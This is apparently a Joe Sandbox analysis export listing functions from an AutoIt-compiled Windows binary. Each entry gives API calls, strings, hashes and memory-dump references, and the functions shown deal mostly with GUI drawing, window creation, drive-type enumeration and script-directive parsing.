API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: bc51ed714296fddfc8cd7161d08b0df63d66b546cac2d1ddbe2cc62a1f88752a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: A0C1E3722051A34ADF2D4639943453FBFA15EB67B270A276FD4B3CB6C1EE28C524C624

Function 0047D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0047D0EB
GetSysColorBrush.USER32(0000000F), ref: 0047D11C
GetSysColor.USER32(0000000F), ref: 0047D128
SetBkColor.GDI32(?,000000FF), ref: 0047D142
SelectObject.GDI32(?,00000000), ref: 0047D151
InflateRect.USER32(?,000000FF,000000FF), ref: 0047D17C
GetSysColor.USER32(00000010), ref: 0047D184
CreateSolidBrush.GDI32(00000000), ref: 0047D18B
FrameRect.USER32(?,?,00000000), ref: 0047D19A
DeleteObject.GDI32(00000000), ref: 0047D1A1
InflateRect.USER32(?,000000FE,000000FE), ref: 0047D1EC
FillRect.USER32(?,?,00000000), ref: 0047D21E
GetWindowLongW.USER32(?,000000F0), ref: 0047D249

Part of subcall function 0047D385: GetSysColor.USER32(00000012), ref: 0047D3BE
Part of subcall function 0047D385: SetTextColor.GDI32(?,?), ref: 0047D3C2
Part of subcall function 0047D385: GetSysColorBrush.USER32(0000000F), ref: 0047D3D8
Part of subcall function 0047D385: GetSysColor.USER32(0000000F), ref: 0047D3E3
Part of subcall function 0047D385: GetSysColor.USER32(00000011), ref: 0047D400
Part of subcall function 0047D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0047D40E
Part of subcall function 0047D385: SelectObject.GDI32(?,00000000), ref: 0047D41F
Part of subcall function 0047D385: SetBkColor.GDI32(?,00000000), ref: 0047D428
Part of subcall function 0047D385: SelectObject.GDI32(?,?), ref: 0047D435
Part of subcall function 0047D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0047D454
Part of subcall function 0047D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0047D46B
Part of subcall function 0047D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0047D480
Part of subcall function 0047D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0047D4A8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 1999e13990f313da30a5d0d76e258fb575f21a207366d6a6e7f5025e05879632
Instruction ID: bf030171c0b82a7bf5c22298f06ce487a4e0db96aec149d4cc4183e05b2e2f78
Opcode Fuzzy Hash: 1999e13990f313da30a5d0d76e258fb575f21a207366d6a6e7f5025e05879632
Instruction Fuzzy Hash: 0B91A272808301BFC7109F64DC08E6BBBB9FF89324F104A2AF966961E0D735D945CB56

Function 0046A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0046A42A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0046A4E9
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0046A527
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0046A539
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0046A57F
GetClientRect.USER32(00000000,?), ref: 0046A58B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0046A5CF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0046A5DE
GetStockObject.GDI32(00000011), ref: 0046A5EE
SelectObject.GDI32(00000000,00000000), ref: 0046A5F2
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0046A602
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046A60B
DeleteDC.GDI32(00000000), ref: 0046A614
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0046A642
SendMessageW.USER32(00000030,00000000,00000001), ref: 0046A659
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0046A694
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0046A6A8
SendMessageW.USER32(00000404,00000001,00000000), ref: 0046A6B9
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0046A6E9
GetStockObject.GDI32(00000011), ref: 0046A6F4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0046A6FF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0046A709

Strings

msctls_progress32, xrefs: 0046A68A
AutoIt v3, xrefs: 0046A577
DISPLAY, xrefs: 0046A5D4
static, xrefs: 0046A5C9, 0046A6E3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 67c94ea1b5fbdc1fc69d8e9c1386bc16eb756e23b202cc33f867e43207cbe7ef
Instruction ID: 76a1d00ebbd31776c471e88158ea1eb4d095b5a8142ef4caf94cba541e63beb3
Opcode Fuzzy Hash: 67c94ea1b5fbdc1fc69d8e9c1386bc16eb756e23b202cc33f867e43207cbe7ef
Instruction Fuzzy Hash: 86A19071A00204BFEB14DBA5DD4AFAE7BB9EB04714F00412AFA15A72E1D674AD40CF68

Function 0045E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045E45E
GetDriveTypeW.KERNEL32(?,004ADC88,?,\\.\,004ADBF0), ref: 0045E54B
SetErrorMode.KERNEL32(00000000,004ADC88,?,\\.\,004ADBF0), ref: 0045E6B1

Strings

SSA, xrefs: 0045E637
iSCSI, xrefs: 0045E653
Unknown, xrefs: 0045E56B, 0045E614
ATA, xrefs: 0045E629
MMC, xrefs: 0045E66F
Network, xrefs: 0045E589
SATA, xrefs: 0045E661
RAMDisk, xrefs: 0045E575
FileBackedVirtual, xrefs: 0045E67D
1394, xrefs: 0045E630
Removable, xrefs: 0045E59D
Virtual, xrefs: 0045E676
\\.\, xrefs: 0045E4B3
Fixed, xrefs: 0045E593
USB, xrefs: 0045E645
Fibre, xrefs: 0045E63E
SAS, xrefs: 0045E65A
SSD, xrefs: 0045E5D8
CDROM, xrefs: 0045E57F
RAID, xrefs: 0045E64C
SCSI, xrefs: 0045E61B
ATAPI, xrefs: 0045E622
PhysicalDrive, xrefs: 0045E4EF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d85568a11faa4051f3376241244dfd571cc84a5a2ab1f6bd1b6eb6dd3e55a302
Instruction ID: 0ebc3f3fc9077487e6331e0692a3ee07eb14f0a59e0a69f11ee0e20c3bccfe55
Opcode Fuzzy Hash: d85568a11faa4051f3376241244dfd571cc84a5a2ab1f6bd1b6eb6dd3e55a302
Instruction Fuzzy Hash: 0951EC35248301ABC208DF16C851E6E77D1AB5478ABA0851FF84697293E62CDF4BD64F

Function 0041C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0041C741
__wcsnicmp.LIBCMT ref: 0041C759
__wcsnicmp.LIBCMT ref: 0041C771
__wcsnicmp.LIBCMT ref: 0041C789
__wcsnicmp.LIBCMT ref: 0041C7A1
__wcsnicmp.LIBCMT ref: 0041C7B5
__wcsnicmp.LIBCMT ref: 0041C7C9
__wcsnicmp.LIBCMT ref: 0041C7E1
__wcsnicmp.LIBCMT ref: 0041C8B2
__wcsnicmp.LIBCMT ref: 0041C8C6
__wcsnicmp.LIBCMT ref: 0041C8DA
__wcsnicmp.LIBCMT ref: 0041C8EE

Strings

#comments-end, xrefs: 0041C8D4
#ce, xrefs: 0041C8E8
#OnAutoItStartRegister, xrefs: 0041C783
Cannot parse #include, xrefs: 00483482
#requireadmin, xrefs: 0041C76B
#comments-start, xrefs: 0041C7C3, 0041C8AC
Unterminated group of comments, xrefs: 00483475
#notrayicon, xrefs: 0041C753
#include, xrefs: 0041C7AF
#cs, xrefs: 0041C7DB, 0041C8C0
#pragma compile, xrefs: 0041C73B
#include-once, xrefs: 0041C79B
Bad directive syntax error, xrefs: 0048346D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 010760f3378b480ed9d076dabea82bfa1ced99540c256a9a61c79e2aec78113a
Instruction ID: e319a24e2586619c4cc655626cbf1273ef382b92651a4d2f5fb0765bc6c09fac
Opcode Fuzzy Hash: 010760f3378b480ed9d076dabea82bfa1ced99540c256a9a61c79e2aec78113a
Instruction Fuzzy Hash: DF614D7168021277D721BE659DC2FFB3358AF1A745F14002BF862A61C2EB9CDA41C69D

Function 004148C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00414956
DeleteObject.GDI32(00000000), ref: 00414998
DeleteObject.GDI32(00000000), ref: 004149A3
DestroyCursor.USER32(00000000), ref: 004149AE
DestroyWindow.USER32(00000000), ref: 004149B9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0048E179
6FEF0200.COMCTL32(?,000000FF,?), ref: 0048E1B2
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0048E5E0

Part of subcall function 004149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00414954,00000000), ref: 00414A23

SendMessageW.USER32 ref: 0048E627
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0048E63E

Strings

0, xrefs: 0048E474

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$CursorF0200InvalidateMoveRect
String ID: 0
API String ID: 1173785582-4108050209
Opcode ID: c863eb1cb9aa962b09eaa8462ae1cf6f42948ded034067118fe452d4a6697cbf
Instruction ID: c84203f59ad6ebfe8437eea63dce7821d6d85ea40fdd8047ce575334881a06ef
Opcode Fuzzy Hash: c863eb1cb9aa962b09eaa8462ae1cf6f42948ded034067118fe452d4a6697cbf
Instruction Fuzzy Hash: A912A070600201DFDB20EF25C884BAABBE5BF45304F54497BE959DB252C739EC86CB99

Function 0047C4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0047C598
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0047C64E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0047C669
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0047C925

Strings

0, xrefs: 0047C6AC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: b484bb175816e1ba498c673822258b5aba09d279673ae3a3383fda948b0259db
Instruction ID: 92fde5bbef225c0639054faee12a9cf0814c4c01c01a234cc28af05914110877
Opcode Fuzzy Hash: b484bb175816e1ba498c673822258b5aba09d279673ae3a3383fda948b0259db
Instruction Fuzzy Hash: 58F1D071504301AFD7258F24C8C5BEBBBE4FF49355F08892EF588962A1C778C845DB5A

Function 00476189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,004ADBF0), ref: 00476245

Strings

CHECK, xrefs: 00476487
TABLEFT, xrefs: 004762A3
GETLINECOUNT, xrefs: 004764E0
GETLINE, xrefs: 00476587
GETCURRENTLINE, xrefs: 00476500
GETCURRENTCOL, xrefs: 00476520
CURRENTTAB, xrefs: 004762D9
ISVISIBLE, xrefs: 00476251
UNCHECK, xrefs: 0047649D
SENDCOMMANDID, xrefs: 004765C6
GETSELECTED, xrefs: 004764BD
ADDSTRING, xrefs: 00476332
GETCURRENTSELECTION, xrefs: 004763FF
DELSTRING, xrefs: 00476365
FINDSTRING, xrefs: 00476392
SHOWDROPDOWN, xrefs: 004762FC
HIDEDROPDOWN, xrefs: 0047631C
TABRIGHT, xrefs: 004762B9
SELECTSTRING, xrefs: 00476422
ISENABLED, xrefs: 00476288
SETCURRENTSELECTION, xrefs: 004763D2
ISCHECKED, xrefs: 00476455
EDITPASTE, xrefs: 00476557

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 1e7ca85a366b8579993e658ca88914d1c4d365d18abf76aa078d73fa9a14e279
Instruction ID: eb5de82b1a40150142fd4872c65ee8ab582f76333d1cbb652c531d16c3d814b4
Opcode Fuzzy Hash: 1e7ca85a366b8579993e658ca88914d1c4d365d18abf76aa078d73fa9a14e279
Instruction Fuzzy Hash: 37C1E7342046019BC604FF15D551AAE77E3AF84358F85886FB84A5B396CB2CDD4ACB4E

Function 0047D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0047D3BE
SetTextColor.GDI32(?,?), ref: 0047D3C2
GetSysColorBrush.USER32(0000000F), ref: 0047D3D8
GetSysColor.USER32(0000000F), ref: 0047D3E3
CreateSolidBrush.GDI32(?), ref: 0047D3E8
GetSysColor.USER32(00000011), ref: 0047D400
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0047D40E
SelectObject.GDI32(?,00000000), ref: 0047D41F
SetBkColor.GDI32(?,00000000), ref: 0047D428
SelectObject.GDI32(?,?), ref: 0047D435
InflateRect.USER32(?,000000FF,000000FF), ref: 0047D454
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0047D46B
GetWindowLongW.USER32(00000000,000000F0), ref: 0047D480
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0047D4A8
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0047D4CF
InflateRect.USER32(?,000000FD,000000FD), ref: 0047D4ED
DrawFocusRect.USER32(?,?), ref: 0047D4F8
GetSysColor.USER32(00000011), ref: 0047D506
SetTextColor.GDI32(?,00000000), ref: 0047D50E
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0047D522
SelectObject.GDI32(?,0047D0B5), ref: 0047D539
DeleteObject.GDI32(?), ref: 0047D544
SelectObject.GDI32(?,?), ref: 0047D54A
DeleteObject.GDI32(?), ref: 0047D54F
SetTextColor.GDI32(?,?), ref: 0047D555
SetBkColor.GDI32(?,?), ref: 0047D55F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0527a170bb7c5b7359c1f07e95afb4c439e0da817d58ebdd688191d8fc061aeb
Instruction ID: c3b8ec8bae6e1478ee1a9f5f8942ebc8cb33437d3166ff1495db13b661fa7c09
Opcode Fuzzy Hash: 0527a170bb7c5b7359c1f07e95afb4c439e0da817d58ebdd688191d8fc061aeb
Instruction Fuzzy Hash: C6513A72D00218BFDF109FA8DC49EEEBBB9EF08320F214526F915AB2A1D7759940CB54

Function 0047B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0047B5C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0047B5D1
CharNextW.USER32(0000014E), ref: 0047B600
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0047B641
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0047B657
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0047B668
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0047B685
SetWindowTextW.USER32(?,0000014E), ref: 0047B6D7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0047B6ED
SendMessageW.USER32(?,00001002,00000000,?), ref: 0047B71E
_memset.LIBCMT ref: 0047B743
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0047B78C
_memset.LIBCMT ref: 0047B7EB
SendMessageW.USER32 ref: 0047B815
SendMessageW.USER32(?,00001074,?,00000001), ref: 0047B86D
SendMessageW.USER32(?,0000133D,?,?), ref: 0047B91A
InvalidateRect.USER32(?,00000000,00000001), ref: 0047B93C
GetMenuItemInfoW.USER32(?), ref: 0047B986
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0047B9B3
DrawMenuBar.USER32(?), ref: 0047B9C2
SetWindowTextW.USER32(?,0000014E), ref: 0047B9EA

Strings

0, xrefs: 0047B95F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: b1bb539efba7181ce401124b5181e5a759bea69decacfc9f0222fe7ddc9ec8d4
Instruction ID: 16217d3a52d9bd4964b4c4b54ffb0c7aa9c873a13aa06864ccaf330c246557d2
Opcode Fuzzy Hash: b1bb539efba7181ce401124b5181e5a759bea69decacfc9f0222fe7ddc9ec8d4
Instruction Fuzzy Hash: 8FE16071900218ABDF109F65CC84FEE7BB8EF05714F10816BF919AA291D7788A41DFA9

Function 0047744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00477587
GetDesktopWindow.USER32 ref: 0047759C
GetWindowRect.USER32(00000000), ref: 004775A3
GetWindowLongW.USER32(?,000000F0), ref: 00477605
DestroyWindow.USER32(?), ref: 00477631
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0047765A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00477678
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0047769E
SendMessageW.USER32(?,00000421,?,?), ref: 004776B3
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004776C6
IsWindowVisible.USER32(?), ref: 004776E6
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00477701
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00477715
GetWindowRect.USER32(?,?), ref: 0047772D
MonitorFromPoint.USER32(?,?,00000002), ref: 00477753
GetMonitorInfoW.USER32 ref: 0047776D
CopyRect.USER32(?,?), ref: 00477784
SendMessageW.USER32(?,00000412,00000000), ref: 004777EF

Strings

0, xrefs: 00477532
(, xrefs: 00477762
tooltips_class32, xrefs: 00477653

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 65f43aa6535cbe14e540961d3e58bac2f394300c914a490f5c762e6a33a73b15
Instruction ID: 24f3f30fc5633581e9ad0a4d25c41032b6d1178f92a0ffc17d58355e112419c6
Opcode Fuzzy Hash: 65f43aa6535cbe14e540961d3e58bac2f394300c914a490f5c762e6a33a73b15
Instruction Fuzzy Hash: 86B18D71608340AFDB04DF65C944BAABBE4BF88314F40892EF58D9B291DB74EC45CB99

Function 0042A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0042A839
